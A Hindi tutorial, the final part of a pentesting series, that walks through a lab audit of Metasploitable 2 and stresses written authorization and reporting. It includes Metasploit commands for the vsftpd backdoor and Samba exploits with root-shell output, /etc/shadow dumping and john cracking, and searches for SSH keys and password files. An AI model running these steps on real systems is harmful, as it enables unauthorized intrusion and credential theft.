हैकर का मार्ग: 5-भाग श्रृंखला
भाग 1: परिचय → भाग 2: Flipper में महारत → भाग 3: Kali की बुनियाद → भाग 4: एक्सप्लॉइटेशन → भाग 5: पूर्ण ऑडिट
आपने यह श्रृंखला यह सोचते हुए शुरू की कि हैकर्स वास्तव में क्या करते हैं। आपने सीखा कि यह हुडी और हरे टेक्स्ट के बारे में नहीं है। यह व्यवस्थित समस्या-समाधान है। आपने बैज क्लोन किए, नेटवर्क मैप किए, handshakes कैप्चर किए और कमजोर मशीनों पर shells प्राप्त किए।
अब हम सब कुछ एक साथ जोड़ते हैं। यह लेख आपको एक काल्पनिक लक्ष्य के खिलाफ एक पूर्ण पेनेट्रेशन टेस्ट के माध्यम से ले जाता है। हर चरण, हर निर्णय, हर खोज, ठीक वैसे ही प्रलेखित जैसे एक पेशेवर करेगा।
परिदृश्य
क्लाइंट: Initech Labs (एक काल्पनिक छोटी टेक कंपनी)
दायरा: आंतरिक नेटवर्क पेनेट्रेशन टेस्ट
लक्ष्य: कमजोरियों की पहचान करना और संभावित व्यापार प्रभाव प्रदर्शित करना
आपका लक्ष्य: आपका अपना लैब नेटवर्क (Kali + Metasploitable 2 + कोई अन्य VM जो आपने सेटअप किया)
एक कॉफी बनाएं। यह मजेदार होने वाला है।
चरण 1: पूर्व-संलग्नता
कीबोर्ड छूने से पहले, पेशेवर पेंटेस्टर व्यापार पक्ष को संभालते हैं। इसे छोड़ दें, और आप पेंटेस्टर नहीं हैं। आप बस अपराध कर रहे हैं।
स्कोपिंग कॉल
एक वास्तविक संलग्नता में, आप क्लाइंट से कॉल करेंगे:
- दायरे में क्या है? कौन से नेटवर्क, IP रेंज, एप्लिकेशन?
- दायरे से बाहर क्या है? प्रोडक्शन सिस्टम? तृतीय-पक्ष सेवाएं?
- टेस्टिंग विंडो? कब टेस्ट कर सकते हैं? केवल कार्य घंटे?
- संपर्क बिंदु? कुछ टूटे तो किसे कॉल करें?
- लक्ष्य? अनुपालन चेकबॉक्स या वास्तविक सुरक्षा सुधार?
आपकी लैब के लिए
दायरा: केवल आपका पृथक लैब नेटवर्क। दायरे से बाहर: बाकी सब कुछ। टेस्टिंग विंडो: जब चाहें। लक्ष्य: करके सीखना।
संलग्नता के नियम
वास्तविक संलग्नताओं में लिखित नियम होते हैं:
- प्राधिकरण पत्र - हस्ताक्षरित दस्तावेज जो साबित करता है कि आपके पास अनुमति है
- एस्केलेशन प्रक्रियाएं - अगर कुछ गंभीर मिले तो क्या करें
- डेटा हैंडलिंग - संवेदनशील डेटा कैसे संभालें
- सफाई आवश्यकताएं - समाप्त होने पर सभी टूल्स और बैकडोर हटाएं
- रिपोर्ट की समयसीमा - अंतिम रिपोर्ट कब देनी है?
हमेशा लिखित अनुमति प्राप्त करें
"दोस्ताना" टेस्ट के लिए भी। एक हस्ताक्षरित ईमेल जो कहता है "आपको मेरे नेटवर्क को तारीख से तारीख तक टेस्ट करने की अनुमति है" एक सीखने के अनुभव और आपराधिक सजा के बीच का अंतर हो सकता है। इसे गंभीरता से लें।
चरण 2: रिकनाइसेंस
लक्ष्य के बारे में सब कुछ जानने का समय। वास्तविक संलग्नता में, इसमें OSINT शामिल होगा: Google खोज, LinkedIn प्रोफाइल, कंपनी वेबसाइट, DNS रिकॉर्ड। हमारी लैब के लिए, हम सीधे सक्रिय रिकनाइसेंस पर जाते हैं।
कदम 1: नेटवर्क खोज
पहला सवाल: इस नेटवर्क पर क्या है?
bash# अपनी नेटवर्क रेंज खोजें
ip a | grep inet
# कुछ ऐसा खोजें: inet 192.168.56.100/24
# सभी लाइव होस्ट खोजें
sudo nmap -sn 192.168.56.0/24 -oA discovery
# परिणाम (उदाहरण):
Nmap scan report for 192.168.56.1
Host is up (0.00032s latency).
Nmap scan report for 192.168.56.101
Host is up (0.00089s latency).
Nmap scan report for 192.168.56.102
Host is up (0.00045s latency).सब कुछ प्रलेखित करें:
text# Initech Labs - नेटवर्क खोज
# तिथि: 2026-03-08
# परीक्षक: आपका नाम
192.168.56.1 - Gateway/Router
192.168.56.101 - अज्ञात (जांच करनी है)
192.168.56.102 - अज्ञात (जांच करनी है)कदम 2: पोर्ट स्कैनिंग
अब गहराई में जाते हैं। कौन सी सेवाएं चल रही हैं?
bash# सेवा पहचान के साथ पूर्ण पोर्ट स्कैन
sudo nmap -sV -sC -p- -oA full_scan 192.168.56.101
# सीखने के दौरान तेज परिणामों के लिए:
sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101Metasploitable 2 पर, आपको खजाना दिखेगा:
textPORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8
139/tcp open netbios-ssn Samba smbd 3.X
445/tcp open netbios-ssn Samba smbd 3.X
3306/tcp open mysql MySQL 5.0.51a
5432/tcp open postgresql PostgreSQL DB
...क्या एक्सपोजर है। नोट्स अपडेट करें:
text192.168.56.101 - Linux Server (Metasploitable)
- FTP (21): vsftpd 2.3.4 # ज्ञात बैकडोर!
- SSH (22): OpenSSH 4.7p1 # प्राचीन
- Telnet (23): सक्रिय # 2026 में यह क्यों मौजूद है?
- HTTP (80): Apache 2.2.8 # वेब ऐप्स टेस्ट करने के लिए
- SMB (139/445): Samba 3.X # संभावित सोने की खान
- MySQL (3306): 5.0.51a # डेटाबेस एक्सेस?
- PostgreSQL (5432): सक्रिय # एक और DBकदम 3: कमजोरी पहचान
देखते हैं वास्तव में क्या एक्सप्लॉइट किया जा सकता है।
bash# कमजोरी स्क्रिप्ट चलाएं
sudo nmap --script vuln -oA vuln_scan 192.168.56.101
# Metasploit में विशिष्ट सेवाएं जांचें
msfconsole
msf6 > search vsftpd
msf6 > search samba 3
msf6 > search apache 2.2vsftpd 2.3.4 बैकडोर तुरंत दिखता है। यह एक गारंटीड shell है। लेकिन एक अच्छा पेंटेस्टर पहली खोज पर नहीं रुकता। सब कुछ प्रलेखित करें।
चरण 3: एक्सप्लॉइटेशन
यहां चीजें रोमांचक होती हैं। हमारे पास कई संभावित प्रवेश बिंदु हैं। व्यवस्थित रूप से काम करें।
अटैक वेक्टर 1: FTP बैकडोर
bashmsf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned
[+] Command shell session 1 opened
whoami
root
id
uid=0(root) gid=0(root)प्रलेखित खोज: FTP बैकडोर के माध्यम से Root shell प्राप्त। पहले स्कैन से पूर्ण समझौते तक का समय: लगभग 10 मिनट।
लेकिन हम यहां नहीं रुकते। और क्या एक्सेस कर सकते हैं?
अटैक वेक्टर 2: Samba
bashbackground
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit
[*] Command shell session 2 opened
whoami
rootएक अलग वेक्टर के माध्यम से एक और root shell। पूर्ण समझौते के दो स्वतंत्र रास्ते।
अटैक वेक्टर 3: वेब एप्लिकेशन
देखते हैं पोर्ट 80 पर क्या चल रहा है।
bashgobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt
# परिणाम:
/cgi-bin/ (Status: 403)
/dav/ (Status: 301)
/icons/ (Status: 301)
/index (Status: 200)
/phpMyAdmin/ (Status: 301)
/phpinfo (Status: 200)
/test/ (Status: 301)
/twiki/ (Status: 301)
nikto -h http://192.168.56.101डिफॉल्ट क्रेडेंशियल्स वाला phpMyAdmin? जांचें:
textUsername: root
Password: (खाली)
# एक्सेस मिल गया!बिना पासवर्ड के डेटाबेस एडमिन एक्सेस। यहां से, हम सारा डेटा निकाल सकते हैं, रिकॉर्ड संशोधित कर सकते हैं या MySQL की फाइल ऑपरेशन का उपयोग करके web shell लिख सकते हैं।
अटैक वेक्टर 4: कमजोर SSH क्रेडेंशियल्स
bashmsf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.56.101
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run
[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'कमजोर क्रेडेंशियल्स SSH एक्सेस देते हैं। Root नहीं, लेकिन पोस्ट-एक्सप्लॉइटेशन में संभालेंगे।
चरण 4: पोस्ट-एक्सप्लॉइटेशन
हमारे पास एक्सेस है। अब क्या? एक वास्तविक पेनेट्रेशन टेस्ट व्यापार प्रभाव प्रदर्शित करता है।
क्रेडेंशियल हार्वेस्टिंग
bashcat /etc/shadow
root:$1$xyz...truncated...:14889:0:99999:7:::
msfadmin:$1$abc...truncated...:14889:0:99999:7:::
user:$1$def...truncated...:14889:0:99999:7:::
postgres:$1$ghi...truncated...:14889:0:99999:7:::
cat /etc/passwd > /tmp/passwd.txt
cat /etc/shadow > /tmp/shadow.txt
unshadow passwd.txt shadow.txt > combined.txt
john --wordlist=/usr/share/wordlists/rockyou.txt combined.txtनेटवर्क रिकनाइसेंस (अंदर से)
bashifconfig
route -n
cat /etc/hosts
arp -a
netstat -tulpn
ss -tulpn
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/nullसंवेदनशील डेटा की खोज
bashfind / -name "*.conf" 2>/dev/null | head -20
find / -name "*.sql" 2>/dev/null
find / -name "*.bak" 2>/dev/null
find / -name "*password*" 2>/dev/null
cat /var/www/*/config.php 2>/dev/null
cat /etc/mysql/my.cnf
mysql -u root -p
mysql> SHOW DATABASES;
mysql> SELECT * FROM mysql.user;प्रिविलेज एस्केलेशन (msfadmin से)
msfadmin के रूप में SSH लॉगिन याद है? भाग 4 में सीखे गए का उपयोग करके root तक बढ़ें।
bashssh [email protected]
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/crontabचरण 5: प्रलेखन और निष्कर्ष
रिपोर्ट के बिना टेस्ट बेकार है। यह पेशेवरों को script kiddies से अलग करता है।
निष्कर्षों का सारांश
"Initech Labs" नेटवर्क पर हमने जो पाया, वास्तविक रिपोर्ट के प्रारूप में:
गंभीर: FTP सेवा बैकडोर (CVE-2011-2523)
प्रभावित सिस्टम: 192.168.56.101
जोखिम: root के रूप में बिना प्रमाणीकरण रिमोट कोड निष्पादन
प्रमाण: 60 सेकंड से कम में पूर्ण root shell प्राप्त
सिफारिश: vsftpd को तुरंत वर्तमान संस्करण में अपडेट करें या FTP सेवा पूरी तरह बंद करें।
गंभीर: Samba रिमोट कोड निष्पादन
प्रभावित सिस्टम: 192.168.56.101
जोखिम: root के रूप में बिना प्रमाणीकरण रिमोट कोड निष्पादन
प्रमाण: usermap_script exploit के माध्यम से पूर्ण root shell प्राप्त
सिफारिश: Samba को वर्तमान संस्करण में अपडेट करें। SMB एक्सेस केवल आवश्यक सिस्टम तक सीमित करें।
उच्च: बिना पासवर्ड MySQL Root एक्सेस
प्रभावित सिस्टम: 192.168.56.101
जोखिम: पूर्ण डेटाबेस समझौता, डेटा चोरी, web shell परिनियोजन
प्रमाण: phpMyAdmin के माध्यम से खाली पासवर्ड से root के रूप में लॉगिन
सिफारिश: मजबूत root पासवर्ड सेट करें। phpMyAdmin एक्सेस प्रतिबंधित करें।
उच्च: कमजोर SSH क्रेडेंशियल्स
प्रभावित सिस्टम: 192.168.56.101
जोखिम: प्रमाणित एक्सेस जो प्रिविलेज एस्केलेशन की ओर ले जाता है
प्रमाण: msfadmin:msfadmin सफलतापूर्वक प्रमाणित
सिफारिश: मजबूत पासवर्ड नीति लागू करें। SSH कुंजी-आधारित प्रमाणीकरण लागू करें।
मध्यम: Telnet सेवा सक्षम
प्रभावित सिस्टम: 192.168.56.101
जोखिम: क्रेडेंशियल्स सादे पाठ में प्रेषित
सिफारिश: Telnet बंद करें। सभी रिमोट प्रशासन के लिए SSH का उपयोग करें।
निम्न: उजागर phpinfo() पेज
प्रभावित सिस्टम: 192.168.56.101
सिफारिश: phpinfo पेज हटाएं या एक्सेस प्रतिबंधित करें।
कार्यकारी सारांश
कार्यकारी सारांश
Initech Labs के आंतरिक नेटवर्क के पेनेट्रेशन टेस्ट के दौरान, सुरक्षा टीम ने मूल्यांकन शुरू करने के 10 मिनट के भीतर मुख्य सर्वर का पूर्ण प्रशासनिक नियंत्रण प्राप्त किया।
प्रमुख निष्कर्ष:
- 2 गंभीर कमजोरियां जो तुरंत रिमोट टेकओवर की अनुमति देती हैं
- 2 उच्च-गंभीरता मुद्दे जो डेटाबेस और उपयोगकर्ता क्रेडेंशियल्स उजागर करते हैं
- कई मध्यम और निम्न निष्कर्ष जो प्रणालीगत सुरक्षा अंतराल दर्शाते हैं
निष्कर्ष: बुनियादी कौशल वाला हमलावर इस सिस्टम को मिनटों में पूरी तरह समझौता कर सकता है। सभी गंभीर और उच्च निष्कर्षों के लिए तत्काल उपचार आवश्यक है।
चरण 6: सफाई और समापन
एक पेशेवर पेंटेस्टर वातावरण को ठीक वैसे ही छोड़ता है जैसा उसने पाया।
bashmsf6 > sessions -l
msf6 > sessions -K
rm /tmp/linpeas.sh
rm /tmp/*.txt
userdel testuser
rm /home/*/.ssh/authorized_keysवास्तविक संलग्नता में, आप यह भी करेंगे:
- टेस्टिंग के दौरान अपलोड किए गए सभी टूल्स हटाएं
- वातावरण में किए गए किसी भी बदलाव को प्रलेखित करें
- निकाले गए डेटा के hashes/checksums प्रदान करें
- रिपोर्ट वितरण के बाद सभी क्लाइंट डेटा सुरक्षित रूप से हटाएं
पूर्ण कार्यप्रणाली चेकलिस्ट
किसी भी पेनेट्रेशन टेस्ट के लिए आपका पुन: प्रयोज्य वर्कफ़्लो:
पेनेट्रेशन टेस्ट कार्यप्रणाली
- पूर्व-संलग्नता
- दायरा और संलग्नता नियम परिभाषित करें
- लिखित प्राधिकरण प्राप्त करें
- संचार चैनल स्थापित करें
- परीक्षण वातावरण सेटअप करें
- रिकनाइसेंस
- नेटवर्क खोज (होस्ट एन्यूमरेशन)
- पोर्ट स्कैनिंग और सेवा पहचान
- कमजोरी स्कैनिंग
- वेब एप्लिकेशन एन्यूमरेशन
- सब कुछ प्रलेखित करें
- एक्सप्लॉइटेशन
- कमजोरियों को मान्य करें (स्कैनर पर आंख बंद करके भरोसा न करें)
- पुष्टि की गई कमजोरियों का शोषण करें
- हर सफल समझौते को प्रलेखित करें
- साक्ष्य कैप्चर करें (स्क्रीनशॉट, लॉग)
- पोस्ट-एक्सप्लॉइटेशन
- समझौता किए गए सिस्टम की गणना करें
- क्रेडेंशियल्स इकट्ठा करें
- संवेदनशील डेटा की पहचान करें
- प्रिविलेज एस्केलेशन का प्रयास करें
- लेटरल मूवमेंट के अवसर खोजें
- रिपोर्टिंग
- कार्यकारी सारांश लिखें (व्यापार प्रभाव)
- सभी निष्कर्ष साक्ष्य के साथ प्रलेखित करें
- उपचार सिफारिशें प्रदान करें
- IT टीमों के लिए तकनीकी विवरण शामिल करें
- सफाई
- सभी टूल्स और आर्टिफैक्ट्स हटाएं
- सभी सत्र और बैकडोर बंद करें
- वातावरण बदलाव प्रलेखित करें
- क्लाइंट डेटा सुरक्षित रूप से संभालें
आगे क्या: आपका मार्ग
आपने हैकर का मार्ग पूरा कर लिया। आप "हैकिंग का मतलब क्या है?" से पूर्ण पेनेट्रेशन टेस्ट करने तक पहुंचे। यह वास्तव में प्रभावशाली है।
लेकिन यह बस शुरुआत है। यहां से आगे जाएं:
अभ्यास प्लेटफॉर्म
- Hack The Box - अभ्यास के लिए यथार्थवादी मशीनें। "आसान" रिटायर्ड बॉक्स से शुरू करें।
- TryHackMe - निर्देशित सीखने के रास्ते।
- VulnHub - डाउनलोड और स्थानीय अभ्यास के लिए मुफ्त कमजोर VMs।
- PentesterLab - वेब एप्लिकेशन सुरक्षा पर केंद्रित।
प्रमाणपत्र (यदि चाहें)
- eJPT - उत्कृष्ट शुरुआती बिंदु, व्यावहारिक परीक्षा
- OSCP - उद्योग मानक, कठिन लेकिन सम्मानित
- PNPT - आधुनिक, व्यावहारिक, रिपोर्ट लेखन शामिल
- CEH - कॉर्पोरेट आवश्यकताओं के लिए, कम व्यावहारिक
विशेषज्ञताएं
- वेब एप्लिकेशन सुरक्षा - OWASP, Burp Suite, SQL injection, XSS
- Active Directory - अधिकांश कॉर्पोरेट वातावरण इसका उपयोग करते हैं
- क्लाउड सुरक्षा - AWS, Azure, GCP पेंटेस्टिंग
- मोबाइल सुरक्षा - Android/iOS एप्लिकेशन परीक्षण
- Red Teaming - पूर्ण विरोधी सिमुलेशन, भौतिक + डिजिटल
- रिवर्स इंजीनियरिंग - मालवेयर विश्लेषण, एक्सप्लॉइट विकास
अपनी होम लैब बनाएं
सबसे अच्छे पेंटेस्टर्स के पास विस्तृत होम लैब होती हैं। सरल शुरू करें:
- Active Directory के साथ Windows Server जोड़ें
- Domain controller सेटअप करें
- कमजोर वेब एप्लिकेशन परिनियोजित करें (DVWA, bWAPP, WebGoat)
- कई सेगमेंट के साथ नेटवर्क बनाएं
- रक्षक के दृष्टिकोण से हमले देखने के लिए HoneyAegis जोड़ें
हैकर का मार्ग: पूर्ण
आपने यह कर दिया। सभी पांच भाग, जिज्ञासु से सक्षम तक।
भाग 1: परिचय भाग 2: Flipper में महारत भाग 3: Kali की बुनियाद भाग 4: एक्सप्लॉइटेशन भाग 5: पूर्ण ऑडिट
श्रृंखला पूर्ण - आपकी यात्रा
भाग 1: आपने सीखा कि हैकिंग वास्तव में क्या है और Flipper Zero के साथ अपनी पहली जीत हासिल की
भाग 2: आपने हर Flipper प्रोटोकॉल में महारत हासिल की: Sub-GHz, RFID, NFC, BadUSB, GPIO
भाग 3: आपने अपनी Kali लैब बनाई, nmap सीखा और WiFi handshakes कैप्चर किए
भाग 4: आपने Metasploit, एक्सप्लॉइटेशन, प्रिविलेज एस्केलेशन और pivoting में महारत हासिल की
भाग 5: आपने सब कुछ एक पूर्ण पेनेट्रेशन टेस्टिंग कार्यप्रणाली में जोड़ दिया
सुरक्षा एक गंतव्य नहीं है। यह एक अभ्यास है। उपकरण बदलेंगे, कमजोरियां विकसित होंगी, लेकिन कार्यप्रणाली वही रहती है। सब कुछ पर सवाल उठाएं। सब कुछ प्रलेखित करें। सीखना कभी बंद न करें।
दूसरी तरफ आपका स्वागत है।
- Lee